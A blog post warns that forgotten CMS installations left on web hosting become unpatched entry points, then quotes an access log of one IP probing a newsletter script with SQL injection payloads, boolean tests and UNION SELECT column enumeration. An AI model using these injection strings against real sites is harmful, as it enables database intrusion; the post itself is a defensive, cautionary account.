leaving old CMS hanging around is really stupid idea

When it comes to data I’m definitely packrat – and that’s a bad habit when updating websites. Yes, keeping old newsletter engine around so archives are accessible keeps linkrot under control but creates at the same time unpatched dungeons that nobody remembers about… and nobody ever updates, of course.

While looking at a hacked WordPress site about a year ago I found on the same hosting possibly 5 copies of Drupal – some ancient sub-site for something, backup copy of that, previous version and then some more instances. A survey engine, possibly remains of document management system … etc. Having deobfuscated the code of malware first lines turned out to be starting from root and looking for everything worth infecting. Impossible to fix, only solution is to archive the code (just-in-case…) and delete it.

And seems I should take some time to go systematically through all my / client hostings as this is not the only site with this problem – and I have left abandoned code around myself. That came back to me while looking for yet another breach and spotting the following lines in logfile:


176.10.100.229 - - [06/Jun/2014:14:19:54 +0300] "GET /newsletter/index.php?id=41 HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:19:55 +0300] "GET /newsletter/index.php?id=999999.9 HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:19:56 +0300] "GET /newsletter/index.php?id=999999.9%20or%201%3D1 HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:19:56 +0300] "GET /newsletter/index.php?id=999999.9%27%20or%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:19:57 +0300] "GET /newsletter/index.php?id=41%20and%201%3D1 HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:19:57 +0300] "GET /newsletter/index.php?id=41%20and%201%3E1 HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:19:58 +0300] "GET /newsletter/index.php?id=41%27%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:19:58 +0300] "GET /newsletter/index.php?id=41%27%20and%20%27x%27%3D%27y HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:19:59 +0300] "GET /newsletter/index.php?id=41%22%20and%20%22x%22%3D%22x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:19:59 +0300] "GET /newsletter/index.php?id=41%22%20and%20%22x%22%3D%22y HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:00 +0300] "GET /newsletter/index.php?id=41%20and%201%3D1 HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:00 +0300] "GET /newsletter/index.php?id=41%27 HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:00 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:01 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:01 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:02 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:03 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:04 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:06 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:07 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:07 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:08 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:08 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:09 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:09 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:10 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:10 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:11 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:11 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:12 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:12 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:13 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:13 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:14 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:14 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:14 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:15 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:15 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:16 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:16 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:17 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:17 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:18 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:18 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:18 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:19 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:19 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:20 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:20 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:21 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:21 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:22 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:22 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:23 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:23 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:23 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:24 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:24 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:25 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:25 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:26 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:26 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:27 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:27 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:28 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:28 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
